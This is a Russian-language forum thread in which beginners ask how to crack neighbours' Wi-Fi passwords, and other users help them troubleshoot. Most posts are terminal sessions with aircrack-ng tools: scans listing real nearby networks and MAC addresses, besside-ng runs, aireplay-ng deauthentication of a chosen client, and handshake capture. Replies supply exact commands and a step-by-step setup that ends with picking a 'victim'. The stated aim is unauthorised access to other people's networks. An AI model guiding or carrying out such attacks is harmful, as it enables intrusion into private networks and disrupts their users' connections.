[Wi-Fi, BT] Задай вопрос - получи ответ!

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by user100, 25 Apr 2015.

  1. Askei

    Askei New Member

    Joined:
    9 May 2015
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    А что за софт для восстановления паролей? Пароль то при этом не поменяется?
    Можешь подробней? А то я профан, не могу найти ничего..(
    Пытался подключиться удаленно к своему 2ому компу в сетке...не даёт! В чем дело? Ввожу имя компьютера, но выдает ошибку(
     
  2. kentuha

    kentuha New Member

    Joined:
    9 May 2015
    Messages:
    57
    Likes Received:
    2
    Reputations:
    0
    Уже который день страдаю на хендшейками. Самая лакомая сетка и никак не хочет поддаваться.
    Роутер настроен провайдером, у нас есть такие "Метросеть", роутер обозван Metro-144, канал не стандартный стоит: 6ch.
    Так вот вопрос, может ли провайдер настроить так, чтобы не видны были подключенные к роутеру устройства?
    Уже второй день скан стоит на хендшейки, сначала вручную, теперь пробую minidwep, все бесполезно, как будто не одного устройства так и не подключено.
    Тут либо люди напрямую подключают комп к роутеру, либо что-то хитро настроено...

    upd:
    дождался я устройства, minidwep пытается снять хендейшк, но пока безрезультатно.
    Есть идеи ребят?
    [​IMG]
     
    #62 kentuha, 11 May 2015
    Last edited: 11 May 2015
  3. Василий-Шишкин

    Joined:
    9 May 2015
    Messages:
    51
    Likes Received:
    0
    Reputations:
    1
    Добрый день.
    В первые пробую взломать пороль WiFi, установил ОС Kali Linux, работаю на ноутбуке от Lenovo G50-30.
    Прочитал статью по ссылке (тоже на этом форуме), и много других.
    Что я делал:
    - подключил WiFi адаптер Alfa AWUS036H.
    - переключил в режим мониторинга:
    Code:
    root@kali-Linux:~# airodump-ng mon0
    
    CH 3 ][ Elapsed: 4 s ][ 2015-05-11 19:29
    
    BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
    
    BC:F6:85:BF:C0:E6 -59 2 0 0 4 54e WPA CCMP PSK Kira-
    10:BF:48:E6:55:18 -70 4 0 0 6 54e WPA2 CCMP PSK Roofl
    B0:B2:DC:DC:C5:59 -63 3 0 0 8 54e WPA2 CCMP PSK Archi
    D4:21:22:53:CE:65 -76 6 0 0 8 54e WPA2 CCMP PSK MGTS_
    B0:B2:DC:DC:C5:58 -67 11 0 0 8 54e WPA2 CCMP PSK Archi
    60:A4:4C:DE:45:48 -74 2 0 0 4 54e WPA2 CCMP PSK ASUS
    C0:C1:C0:48:76:8F -74 2 0 0 2 54e. WPA2 CCMP PSK Alati
    60:A4:4C:A2:B7:F8 -65 2 0 0 13 54e WPA2 CCMP PSK TAGNA
    00:14:D1:A5:4A:95 -67 2 0 0 11 54e. WPA2 CCMP PSK SPIDE
    D8:50:E6:D7:39:60 -67 12 3 0 6 54e WPA2 CCMP PSK Anako
    00:22:15:71:2A:E5 -59 20 3 0 6 54 WPA TKIP PSK WL520
    00:1C:F0:3B:C3:05 -66 18 4 1 6 54 . WPA TKIP PSK dlink
    C4:6E:1F:D5:AE:8A -71 2 0 0 6 54e. WPA2 CCMP PSK TP-LI
    90:E6:BA:F1:6C:30 -57 3 2 0 6 54 WPA2 CCMP PSK proje
    00:25:9C:F7:36:85 -53 21 0 0 9 54e. WPA2 CCMP PSK Port
    D4:21:22:99:45:61 -75 3 0 0 1 54e WPA2 CCMP PSK MGTS_
    00:17:9A:84:FD:45 -71 3 0 0 3 54 . WPA2 CCMP PSK 2b4A9
    C2:9F:DB:F7:43:B4 -69 0 3 0 1 -1 OPN <leng
    
    - затем перещел к перехвату хендшейка (проблема сразу выявилась): на форуме Античат и на других всегда при взломе были определены клиенты (station), а у меня это не происходило вообще вот что у меня показывало:
    Code:
    root@kali-Linux:~# airodump-ng mon0
    
    CH 5 ][ Elapsed: 1 min ][ 2015-05-11 20:49 ][ display sta only
    
    BSSID STATION PWR Rate Lost Frames Probe
    
    (not associated) 14:36:C6:AB:6C:94 -73 0 - 1 0 1
    (not associated) 00:C0:CA:81:EC:0E 0 0 - 1 0 7
    (not associated) 9C:AD:97:4D:37:19 0 0 - 1 0 39
    (not associated) 18:00:2D:8A:FE:6D -61 0 - 1 0 1
    (not associated) 80:EA:96:C9:25:9B -65 0 - 1 0 14
    (not associated) AC:7F:3E:6B:AA:7F -67 0 - 1 0 1
    (not associated) 30:10:B3:A2:C9:73 -69 0 - 1 0 9
    (not associated) 6C:B7:F4:AE:BC:42 -69 0 - 1 0 3 YOTA
    (not associated) A8:BB:CF:A9:90:D4 -73 0 - 1 0 1
    (not associated) A8:BB:CF:C8:DB:F1 -73 0 - 1 0 1
    (not associated) 00:21:63:80:CD:12 -73 0 - 1 0 1
    (not associated) 80:56:F2:03:33:97 -71 0 - 1 38 4
    (not associated) B0:10:41:02:4E:57 -75 0 - 1 0 1 Rooflux
    (not associated) F0:24:75:D4:91:DB -75 0 - 1 0 1
    (not associated) B0:10:41:DD:97:92 -79 0 - 1 0 6
    (not associated) 44:6D:57:BE:2D:4B -81 0 - 1 0 1 UPVEL UR-325BN
    (not associated) 6C:3E:6D:65:9C:CA -81 0 - 1 0 1
    (not associated) BC:92:6B:1C:06:D3 -69 0 - 1 0 2
    (not associated) BC:CF:CC:8E:95:44 -73 0 - 1 0 1
    (not associated) 44:6D:57:3A:1E:B1 -69 0 - 1 0 1 asunto
    (not associated) C0:18:85:4D:22:53 -77 0 - 1 0 1
    (not associated) C0:64:C6:4F:25:48 -75 0 - 1 0 1
    (not associated) 90:48:9A:35:39:5F -73 0 - 1 0 3
    (not associated) 54:EF:92:23:C7:30 -29 0 - 1 0 5
    
    как видно в коде к любому клиенту пишет not associated.
    - С начало подумал, что для besside-ng все равно, но оказалось нет.
    Вот что я увидел:
    Code:
    root@kali-Linux:~# besside-ng mon0
    [20:04:44] Let's ride
    [20:04:44] Resuming from besside.log
    [20:04:44] Appending to wpa.cap
    [20:04:44] Appending to wep.cap
    [20:04:44] Logging to besside.log
    [20:05:00] TO-OWN [nbn-78*, MGTS_GPON_9228*, Alatin_Home*, Kira-WiFi*, Sashko*, tax*, Rooflux_5*, UPVEL UR-325BN*, 2b4A9Z72*, dlink*, Ali-1*, ASUS*, Rooflux*, Anakonda38*, WL520GC_1q1J*, ASUS1*, internetanet*, Port Royal*, ahalaimahalai*, Archiv_guest*, Archiv*, ASUS*, MGTS_GPON_4889*, YOTA*, Mgts_75*, WirelessNet*, SPIDER MAN*, asunto*, homezone*, WirelessNet*, project*, TAGNANG*, mgts87*, INGERSOLL*, ZyXEL_KEENETIC_4G_FCD75C*, TP-LINK_D5AE8A*, mgts98*, MGTS_1232470*, Kanadci*] OWNED []
    [20:05:03] Crappy connection - nbn-78 unreachable got 0/10 (100% loss) [-73 dbm]
    [20:05:07] Crappy connection - MGTS_GPON_9228 unreachable got 0/10 (100% loss) [-65 dbm]
    [20:05:08] Crappy connection - Alatin_Home unreachable got 1/10 (90% loss) [-69 dbm]
    [20:05:42] Crappy connection - Rooflux_5 unreachable got 2/10 (80% loss) [-73 dbm]
    [20:05:45] Crappy connection - UPVEL UR-325BN unreachable got 2/10 (80% loss) [-73 dbm]
    [20:06:09] Crappy connection - Ali-1 unreachable got 1/10 (90% loss) [-75 dbm]
    [20:07:02] Crappy connection - internetanet unreachable got 0/10 (100% loss) [-73 dbm]
    [20:07:14] Crappy connection - ahalaimahalai unreachable got 0/10 (100% loss) [-69 dbm]
    [20:08:39] Crappy connection - asunto unreachable got 0/10 (100% loss) [-75 dbm]
    [20:08:51] Crappy connection - WirelessNet unreachable got 0/10 (100% loss) [-83 dbm]
    [20:09:25] Crappy connection - INGERSOLL unreachable got 0/10 (100% loss) [-73 dbm]
    [20:09:56] Crappy connection - MGTS_1232470 unreachable got 0/10 (100% loss) [-73 dbm]
    [20:10:07] Crappy connection - 261fa8 unreachable got 0/10 (100% loss) [-75 dbm]
    [20:10:19] Crappy connection - MKNet unreachable got 0/10 (100% loss) [-71 dbm]
    [20:10:30] Crappy connection - Sakura unreachable got 0/10 (100% loss) [-79 dbm]
    [20:10:53] Crappy connection - Slon unreachable got 0/10 (100% loss) [-75 dbm]
    [20:10:56] Crappy connection - NETGEAR38 unreachable got 0/10 (100% loss) [-77 dbm]
    [20:10:57] Crappy connection - Homenet unreachable got 0/10 (100% loss) [-75 dbm]
    [20:11:01] Crappy connection - DIR-620 unreachable got 1/10 (90% loss) [-76 dbm]
    [20:11:24] Crappy connection - Proton Wi-Fi unreachable got 0/10 (100% loss) [-73 dbm]
    [20:11:27] Crappy connection - unreachable got 0/10 (100% loss) [-75 dbm]
    [20:11:28] Crappy connection - onlime-109 unreachable got 0/10 (100% loss) [-75 dbm]
    [20:11:32] Crappy connection - 14 unreachable got 0/10 (100% loss) [-69 dbm]
    
    С первого взгляда кажется, что все "ок", однако решил проверить качество пойманого хендшейка, перешел в папку wep.cap и wireshark пишет :
    Но всеже окрывает, и там ни чего нет, иногда есть но ни каких хендшейков, лишь информация о роутре и тому подобное.
    через aircrack-ng, но все равно ни чего не вышло:
    Code:
    root@kali-Linux:~# aircrack-ng /wep.cap
    Opening /wep.cap
    read(file header) failed: Success
    Read 0 packets.
    
    No networks found, exiting.
    
    Quitting aircrack-ng...
    
    - снова перешел к airodump-ng, попробовал:
    Code:
    root@kali-Linux:~# airodump-ng --bssid CC:5D:4E:DA:11:C8 -c1 -w hachthis mon0
    
    CH 1 ][ Elapsed: 59 mins ][ 2015-05-11 20:02 ][ fixed channel mon0: -1
    
    BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
    
    CC:5D:4E:DA:11:C8 -60 0 5500 417 0 1 54e WPA2 CCMP PSK Sashko
    
    BSSID STATION PWR Rate Lost Frames Probe
    
    в этоже время пробовал откдючвть клиентов:
    Code:
    root@kali-Linux:~# aireplay-ng --deauth 5 -a CC:5D:4E:DA:11:C8 mon0
    21:08:34 Waiting for beacon frame (BSSID: CC:5D:4E:DA:11:C8) on channel -1
    21:08:34 Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch
    Please specify an ESSID (-e).
    root@kali-Linux:~# aireplay-ng --deauth 5 -a CC:5D:4E:DA:11:C8 -e Sashko mon0
    21:08:41 Waiting for beacon frame (BSSID: CC:5D:4E:DA:11:C8) on channel -1
    21:08:41 Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch
    
    - снова ни чего не вышло, только других способов больше не знаю.
    В чем ошибка ума не приложу, весь русские и английские форумы и статьи прочитал и облазил, полностю в ТУПИКЕ.
    Заранее благодарен.[/QUOTE][/QUOTE]
     
    #63 Василий-Шишкин, 12 May 2015
    Last edited: 12 May 2015
  4. ak_45

    ak_45 Banned

    Joined:
    16 Dec 2011
    Messages:
    82
    Likes Received:
    7
    Reputations:
    0
    - а что ты там хотел увидеть? у тебя и нет точек с WEP шифрованием.
    - для перехвата в besside-ng точек с WPA надо хелп читать внимательно:

    To get WPA handshake from a specific target (channel and BSSID):
    # besside-ng -W -c 6 -b 00:00:11:22:33:44 mon0
     
  5. Василий-Шишкин

    Joined:
    9 May 2015
    Messages:
    51
    Likes Received:
    0
    Reputations:
    1
    WEP - точки обязательно нужны? Автор же писал что это большая редкость, как я их найду тогда?
     
  6. Василий-Шишкин

    Joined:
    9 May 2015
    Messages:
    51
    Likes Received:
    0
    Reputations:
    1
    Слишком громко сказал, не найду. Шел около BMW центра:
    Code:
    CH  2 ][ Elapsed: 1 min ][ 2015-05-12 13:44  
      
    BSSID  PWR  Beacons  #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
      
    02:B3:6E:F6:22:9E  -1  3  0  0  6  11  OPN  HP3420  
    60:A4:4C:F0:1B:18  -58  71  36  0  6  54e. WPA2 CCMP  PSK  WEYLAND  
    -----> 1C:BD:B9:3E:1D:24  -58  132  116  0  1  54 . WEP  WEP  BMTWlan_1  
    10:FE:ED:36:F3:3E  -66  93  0  0  6  54e. WPA2 CCMP  PSK  Belka  
    -----> 00:1F:1F:C5:F5:58  -68  121  0  0  11  54e  WEP  WEP  Digitus304  
    00:22:55:57:51:00  -65  85  114  0  7  54e. OPN  bmstu_staff  
    BC:F6:85:44:9B:CE  -65  135  0  0  5  54e  WPA  CCMP  PSK  homeAL  
    EC:43:F6:08:E0:7C  -64  89  7  0  4  54e  WPA2 CCMP  PSK  sen_shamon  
    C0:4A:00:DF:4A:E6  -66  103  0  0  9  54e. WPA2 CCMP  PSK  s13195  
    B8:A3:86:14:13:F0  -66  126  0  0  2  54e  WPA  CCMP  PSK  instation  
    10:FE:ED:80:95:10  -66  9  0  0  8  54e. WPA2 CCMP  PSK  TP-LINK  
    1C:7E:E5:91:DB:4C  -66  16  5  0  6  54e  WPA  CCMP  PSK  DIR-620  
    10:7B:EF:56:2B:BC  -68  106  2  0  3  54e  WEP  WEP  vpn9001  
    00:18:E7:E8:51:9B  -69  25  0  0  9  54e. WPA2 CCMP  PSK  dlink  
    00:1E:E5:A0:27:B0  -67  53  56  1  6  54  WPA2 CCMP  PSK  Inet1125  
    00:1E:E5:A0:25:30  -69  88  72  0  11  54  WPA2 CCMP  PSK  Inet829  
    E0:CB:4E:0B:11:6F  -68  57  3  0  6  54  WPA  TKIP  PSK  Zahar  
    00:26:5A:18:D6:34  -68  48  0  0  12  54e. WPA2 TKIP  PSK  malahit_hall  
    C0:4A:00:E4:E3:46  -68  22  1  0  4  54e  WPA2 CCMP  PSK  MNE NE JALKO  
    40:4A:03:79:81:70  -68  33  0  0  10  54e  WPA2 CCMP  PSK  ZyXEL_KEENETIC_798170  
    FC:F5:28:65:0C:96  -68  107  0  0  1  54  WPA2 CCMP  PSK  ROBOT  
    00:22:B0:40:16:67  -69  94  2  0  3  54 . WPA2 TKIP  PSK  208  
    E0:CB:4E:FC:7D:D5  -69  77  6  0  11  54  WPA  TKIP  PSK  wild  
    0E:18:D6:47:E9:E0  -71  8  0  0  6  54e. WPA2 CCMP  PSK  Hololab_guest  
    58:6D:8F:36:D7:5A  -69  8  3  0  6  54e  WPA2 CCMP  PSK  SkyNet  
    00:27:22:E8:1E:62  -69  4  0  0  1  54e. WPA  TKIP  PSK  ubnt11951  
    CC:5D:4E:FD:34:C8  -69  5  0  0  6  54e  WPA2 CCMP  PSK  TOLSTY  
    00:03:7F:FE:00:00  -69  211  2  0  3  54  WPA2 CCMP  PSK  ibm506  
    B8:A3:86:0B:BF:1A  -69  29  0  0  9  54e  WPA  CCMP  PSK  METRO  
    12:18:D6:47:E9:E0  -70  10  0  0  6  54e. WPA2 CCMP  PSK  <length:  0>  
    6A:28:5D:67:19:E8  -69  28  0  0  1  54e  WPA2 CCMP  PSK  Keenetic-2528  
    E8:94:F6:E5:89:9C  -70  15  0  0  10  54e. WPA2 CCMP  PSK  The_SpeeRT  
    0A:18:D6:47:E9:E0  -70  6  0  0  6  54e. WPA2 CCMP  MGT  Hololab  
    BC:F6:85:CA:33:D2  -71  53  0  0  11  54e  WPA2 CCMP  PSK  DIR-615  
    34:08:04:13:0A:FE  -73  2  0  0  11  54e  WPA2 CCMP  PSK  Mixa83  
    28:28:5D:96:CA:24  -71  107  0  0  3  54e  WPA2 CCMP  PSK  Keenetic-3064  
    90:4E:2B:E4:5B:48  -71  32  0  0  3  54e  OPN  HUAWEI-GLR29J  
    BC:EE:7B:65:EF:64  -71  31  0  0  10  54e  WPA  TKIP  PSK  VPN7505  
    00:21:D8:93:DC:50  -71  7  0  0  8  54e. OPN  bmstu_staff  
    10:FE:ED:82:24:1E  -72  17  0  0  11  54e. WPA2 CCMP  PSK  TP-LINK_82241E  
    C4:A8:1D:5B:BB:47  -71  25  0  0  1  54e  WPA2 CCMP  PSK  Deonis2222  
    00:3A:9A:A5:6E:91  -73  10  0  0  11  54e. OPN  bmstu_staff  
    00:3A:9A:A5:6E:99  -70  13  0  0  11  54e. OPN  bmstu_guest  
    1C:7E:E5:E3:FA:52  -73  28  0  0  13  54e  WPA2 TKIP  PSK  72111  
    84:C9:B2:4C:DE:D5  -73  62  0  0  3  54e. WPA2 CCMP  PSK  s4929  
    B0:B2:DC:3E:65:4C  -73  9  0  0  1  54e  WPA2 CCMP  PSK  Army  
    28:28:5D:67:8D:34  -74  9  0  0  1  54e  WPA2 CCMP  PSK  dimon0764  
    00:18:39:76:AA:CA  -73  2  0  0  11  54  WPA  TKIP  PSK  linksys  
    00:1E:E5:A0:27:20  -73  0  2  0  6  -1  WPA  <length:  0>  
    90:94:E4:EF:32:38  -73  7  0  0  1  54e  WPA2 CCMP  PSK  Kostik  
    40:4A:03:79:2F:95  -72  19  0  0  1  54e  WPA2 CCMP  PSK  s10932  
    B0:B2:DC:5B:C7:C4  -73  16  1  0  1  54e  WPA2 CCMP  PSK  SovAsQ  
    AC:22:0B:7C:B9:38  -76  12  0  0  13  54e  WPA2 CCMP  PSK  BURGUY  
    00:14:D1:E2:D2:2A  -75  6  0  0  1  54 . WPA2 TKIP  PSK  Bardak  
    EC:43:F6:E1:EE:BC  -75  3  0  0  3  54e  WPA2 CCMP  PSK  119  
    40:4A:03:44:8A:BA  -75  8  0  0  3  54  WPA  TKIP  PSK  Pavel-PC  
    00:3A:9A:A5:6E:90  -75  1  0  0  11  54e. OPN  bmstu_lb  
    E8:DE:27:C2:EC:1E  -72  5  0  0  9  54e. WPA2 CCMP  PSK  O13311
    
    сразу 2 штуки нашел.
    Code:
    root@kali-Linux:~# besside-ng -W -c 1 -b 1C:BD:B9:3E:1D:24 mon0
    [13:57:01] Let's ride
    [13:57:01] Resuming from besside.log
    [13:57:01] Appending to wpa.cap
    [13:57:01] Appending to wep.cap
    [13:57:01] Logging to besside.log
    [13:57:01] Can't attack BMTWlan_1
    [13:57:01] All neighbors owned
    
    Dying...
    [13:57:01] TO-OWN [] OWNED []
    
    Почему-то не хочет.
     
    #66 Василий-Шишкин, 12 May 2015
    Last edited: 12 May 2015
  7. ak_45

    ak_45 Banned

    Joined:
    16 Dec 2011
    Messages:
    82
    Likes Received:
    7
    Reputations:
    0
    - ну тут есть, а в верхнем скрине не было.
    - открывай besside.log и смотри что он тебе там наловил.
    - флаг -W только для WPA.
    - root@kali-Linux:~# besside-ng -W -c 1 -b 1C:BD:B9:3E:1D:24 mon0
    зачем ты для WEP даёшь флаг -W ?
    - для WPA запусти так просто может чё и словит:
    root@kali-Linux:~# besside-ng -W mon0
     
  8. Василий-Шишкин

    Joined:
    9 May 2015
    Messages:
    51
    Likes Received:
    0
    Reputations:
    1
    Наконец-то найшел долгожданного клиента:
    Code:
    CH  6 ][ Elapsed: 5 mins ][ 2015-05-12 14:28 ][ fixed channel mon0: -1 
     
    BSSID  PWR RXQ  Beacons  #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
     
    60:A4:4C:F0:1B:18  -59  0  928  392  0  6  54e. WPA2 CCMP  PSK  WEYLAND 
     
    BSSID  STATION  PWR  Rate  Lost  Frames  Probe 
     
    60:A4:4C:F0:1B:18  B4:52:7E:97:D3:F4  -65  0 - 1  0  9
    
    Отключаю клиента от сети:
    Code:
    root@kali-Linux:~# aireplay-ng --deauth 5 -e WEYLAND -a 60:A4:4C:F0:1B:18 -c B4:52:7E:97:D3:F4 mon0
    14:26:59  Waiting for beacon frame (BSSID: 60:A4:4C:F0:1B:18) on channel -1
    14:26:59  Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch
    root@kali-Linux:~# aireplay-ng --deauth 5 -e WEYLAND -a 60:A4:4C:F0:1B:18 -c B4:52:7E:97:D3:F4 wlan0
    ioctl(SIOCSIWMODE) failed: Device or resource busy
    
    ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211,
    ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead.  Make
    sure RFMON is enabled: run 'airmon-ng start wlan0 <#>'
    Sysfs injection support was not found either.
    
    
    но ни чего не смог

    -W что она делает?
    Конкретный роутер пробую ломануть :
    Code:
    root@kali-Linux:~# besside-ng -W -c 6 -b 60:A4:4C:F0:1B:18 mon0
    [14:24:16] Let's ride
    [14:24:16] Resuming from besside.log
    [14:24:16] Appending to wpa.cap
    [14:24:16] Appending to wep.cap
    [14:24:16] Logging to besside.log
    [14:24:17] Got replayable packet for BMTWlan_1 [len 86]
    [14:30:29] Got replayable packet for  [len 86]
    [14:35:00] - Attacking [WEYLAND] WPA - DEAUTH (know 2 clients)
    
    жду пока, может чо получится.
     
  9. ak_45

    ak_45 Banned

    Joined:
    16 Dec 2011
    Messages:
    82
    Likes Received:
    7
    Reputations:
    0
    - ерундой страдаешь, запускай minidwep-gtk, она автоматом всё делает и для WPA и WEP.
     
  10. Василий-Шишкин

    Joined:
    9 May 2015
    Messages:
    51
    Likes Received:
    0
    Reputations:
    1
    Можете написать целый код или хотябы пример, я новичок в этом не могу так сходу все понимать.
     
  11. ak_45

    ak_45 Banned

    Joined:
    16 Dec 2011
    Messages:
    82
    Likes Received:
    7
    Reputations:
    0
    - minidwep-gtk это прога, где в Kali она не знаю, пользуюсь WIFISLAX.
     
  12. baikalow

    baikalow Member

    Joined:
    6 Sep 2013
    Messages:
    40
    Likes Received:
    7
    Reputations:
    1
    может кто разжувать поподробнее как урезать cap файл?
     
  13. Merdue

    Merdue New Member

    Joined:
    12 May 2015
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте все !
    Задам риторический вопрос Windows 8.1 64 WiFi RTL 8812UA TP-Link очень долго при загрузке поднимается WIFI сетка, кто знает как ускорить этот процесс - загрузка драйвера и подъем соединения WiFi !
    Конечно это тривиально, но может кто знает т.к. на устройстве нет проводной сети ! Спс.!
     
  14. Василий-Шишкин

    Joined:
    9 May 2015
    Messages:
    51
    Likes Received:
    0
    Reputations:
    1
    Добрый вечер.
    Во время перехвата хендшейка, появилась проблема: при отключении клиентов от сети (роутера) пишет: No such BSSID available. Вот что я делал:
    - нашел роутеров и клиентов
    Code:
    CH  7 ][ Elapsed: 8 s ][ 2015-05-12 20:27
    
    BSSID  PWR  Beacons  #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
    
    28:31:52:24:62:5F  -69  4  0  0  6  54e. WPA2 CCMP  PSK  cln_wifi_mgts
    54:04:A6:5B:9D:94  -66  15  0  0  5  54e  WPA2 CCMP  PSK  MosUrGarant
    B8:A3:86:6B:F5:CC  -68  2  0  0  6  54e  WPA2 CCMP  PSK  WE_ARE_HERE
    1C:AF:F7:82:6A:62  -67  9  0  0  6  54  WPA2 TKIP  PSK  dlink
    BA:2B:C1:5A:15:A7  -1  4  0  0  10  54  OPN  Portthru
    C4:6E:1F:A4:B6:C0  -57  18  0  0  3  54e. WPA  CCMP  PSK  cosmos13287
    64:70:02:A1:BA:AE  -48  15  0  0  11  54e. WPA2 CCMP  PSK  TechNoServ
    C2:4A:00:7F:B2:6E  -47  20  0  0  11  54 . WPA  CCMP  PSK  <length:  0>
    C0:4A:00:7F:B2:6E  -49  17  0  0  11  54e. WPA2 CCMP  MGT  TechnoServCORP
    E4:68:A3:10:04:DE  -55  9  0  0  11  54e. WPA2 CCMP  PSK  MGTS_112
    10:FE:ED:F6:52:31  -53  38  0  0  6  54e. WPA2 CCMP  PSK  PPRB Hotel 5
    4E:5D:4E:4B:93:E8  -56  24  0  0  5  54e  WPA2 CCMP  PSK  MosUrGarant
    94:04:9C:62:D7:98  -59  12  0  0  11  54e  WPA2 CCMP  PSK  MGTS 119
    10:FE:ED:F6:47:EB  -62  6  0  0  2  54e. WPA2 CCMP  PSK  PPRB Hotel 4
    4C:5E:0C:6A:E0:85  -47  10  0  0  4  54e. WPA2 CCMP  PSK  MKT-Wireless
    4E:5D:4E:4B:93:E9  -55  25  0  0  5  54e  WPA2 CCMP  PSK  MosUr
    E4:68:A3:10:0A:F6  -63  15  0  0  6  54e. WPA2 CCMP  PSK  mgts-115
    7C:B7:33:25:7E:84  -65  4  1  0  6  54e  WPA2 CCMP  PSK  AKADO-7E7E
    EC:43:F6:05:34:88  -65  4  0  0  2  54e  WPA2 CCMP  PSK  ALGO_WIFI
    08:60:6E:EF:1A:98  -62  17  1  0  11  54e  WPA2 CCMP  PSK  Home126-2
    C8:D3:A3:EC:95:5A  -66  13  0  0  11  54e  WPA  CCMP  PSK  DSL-2740U
    F8:C0:91:13:B2:FF  -67  10  0  0  8  54e  WPA2 CCMP  PSK  onlime9
    7C:B7:33:26:84:08  -66  3  1  0  1  54e  WPA2 CCMP  PSK  AKADO-8402
    E4:68:A3:0F:DC:98  -65  12  0  0  6  54e. WPA2 CCMP  PSK  mgts-111
    60:33:4B:E3:54:C7  -65  7  0  0  7  54e. WPA2 CCMP  PSK  Apple Forevah Nah
    00:27:22:E8:1E:3C  -67  10  0  0  8  54e. WPA  TKIP  PSK  UBNT10780
    B8:BE:BF:EF:83:19  -69  3  0  0  1  54e. WPA2 CCMP  PSK  CLASS-211
    1C:BD:B9:B2:43:02  -69  5  0  0  11  54e. WPA2 CCMP  PSK  dlink-dlink
    00:17:31:1B:03:E2  -70  4  0  0  1  54  WPA  TKIP  PSK  Tata-77
    00:24:8C:A0:46:E5  -68  13  1  0  6  54  WPA  TKIP  PSK  tsj
    10:FE:ED:F6:4E:ED  -72  2  0  0  2  54e. WPA2 CCMP  PSK  PPRB Hotel 4
    E0:CE:C3:C6:F5:C6  -73  2  1  0  8  54e  WPA2 CCMP  PSK  AKADO-F5C0
    
    BSSID  STATION  PWR  Rate  Lost  Frames  Probe
    
    BA:2B:C1:5A:15:A7  00:15:99:B0:75:A0  -73  0 - 1  31  4
    (not associated)  00:C0:CA:81:EC:0E  -9  0 - 1  0  2
    (not associated)  AC:38:70:92:07:4D  -65  0 - 1  0  1
    (not associated)  00:18:DE:D0:BD:EA  -69  0 - 1  17  7  Spacenet
    (not associated)  F8:D1:11:08:31:51  -69  0 - 1  0  1  mgts-148
    (not associated)  00:16:EB:1F:65:E4  -69  0 - 1  48  10  AKADO-24B8
    (not associated)  84:7A:88:97:06:C8  -73  0 - 1  44  5
    (not associated)  24:0A:64:74:54:53  -71  0 - 1  0  1
    
    - выбрал нужный канал и BSSID
    Code:
    CH 10 ][ Elapsed: 38 mins ][ 2015-05-12 21:06 ][ fixed channel mon0: -1
    
    BSSID  PWR RXQ  Beacons  #Data, #/s  CH  MB  ENC  CIPHER AUTH E
    
    BA:2B:C1:5A:15:A7  -1  0  2978  0  0  10  54  OPN  P
    
    BSSID  STATION  PWR  Rate  Lost  Frames  Probe
    
    BA:2B:C1:5A:15:A7  00:15:99:B0:75:A0  -73  0 - 1  0  2983
    
    И самое интересное, пытаюсь отключить клиента ( со всех сайтов команды пробовал) :
    Code:
    root@kali-Linux:~# aireplay-ng -1 9999 -e Portthru -a BA:2B:C1:5A:15:A7 -c 00:15:99:B0:75:A0 --ignore-negative-one mon0No source MAC (-h) specified. Using the device MAC (9C:AD:97:4D:37:19)
    21:08:43  Waiting for beacon frame (BSSID: BA:2B:C1:5A:15:A7) on channel -1
    21:08:54  No such BSSID available.
    root@kali-Linux:~# aireplay-ng -1 6000 -e Portthru -a BA:2B:C1:5A:15:A7 --ignore-negative-one mon0
    No source MAC (-h) specified. Using the device MAC (9C:AD:97:4D:37:19)
    21:09:03  Waiting for beacon frame (BSSID: BA:2B:C1:5A:15:A7) on channel -1
    21:09:13  No such BSSID available.
    root@kali-Linux:~# aireplay-ng -1 6000 -o 1 -q 100 -e Portthru -a BA:2B:C1:5A:15:A7 --ignore-negative-one mon0
    No source MAC (-h) specified. Using the device MAC (9C:AD:97:4D:37:19)
    21:09:30  Waiting for beacon frame (BSSID: BA:2B:C1:5A:15:A7) on channel -1
    21:09:40  No such BSSID available.
    root@kali-Linux:~# aireplay-ng -1 6000 -o 1 -q 100 -e Portthru -a BA:2B:C1:5A:15:A7 -c 00:15:99:B0:75:A0 --ignore-negative-one mon0
    No source MAC (-h) specified. Using the device MAC (9C:AD:97:4D:37:19)
    21:09:57  Waiting for beacon frame (BSSID: BA:2B:C1:5A:15:A7) on channel -1
    21:10:07  No such BSSID available.
    root@kali-Linux:~# aireplay-ng -1 6000 -o 1 -q 100 -e Portthru -a BA:2B:C1:5A:15:A7 -h 00:15:99:B0:75:A0 --ignore-negative-one mon0
    The interface MAC (9C:AD:97:4D:37:19) doesn't match the specified MAC (-h).
       ifconfig mon0 hw ether 00:15:99:B0:75:A0
    21:10:16  Waiting for beacon frame (BSSID: BA:2B:C1:5A:15:A7) on channel -1
    21:10:26  No such BSSID available.
    
    Что я не пробовал резудьтат один.
    А ждать пока клиент сам оключится от сети, это может только завтра произойти.

    ------------------------------------------------------------------------------------------------------------------------------------------------------------

    Плохой, конечно, пример выбрал, так как сеть эта открыта, но суть не в этом есть море примеров:
    Code:
    root@kali-Linux:~# aireplay-ng -1 9999 -e HP02ACAB -a 02:2F:0F:AE:44:A9 -c 2C:76:8A:02:AC:AB --ignore-negative-one mon0
    No source MAC (-h) specified. Using the device MAC (9C:AD:97:4D:37:19)
    21:28:59  Waiting for beacon frame (BSSID: 02:2F:0F:AE:44:A9) on channel -1
    21:29:09  No such BSSID available.
    
    Этот пример с закрытой сетью (WPA2).
     
    #74 Василий-Шишкин, 12 May 2015
    Last edited: 12 May 2015
  15. Biship

    Biship Member

    Joined:
    30 Jan 2012
    Messages:
    37
    Likes Received:
    15
    Reputations:
    0
    1. Останавливаешь wifi адаптер командой:
    ifconfig wlanX down (где X это номер твоего адаптера, узнать можно командой ifconfig -a)

    2. Убиваешь мешающие процессы командой
    airmon-ng wlanX check kill

    3. Запускаешь режим мониторинга
    airmon-ng start wlanX (появится адаптер mon0)

    4. Далее смотришь не спеша по каналам выбирая жертву
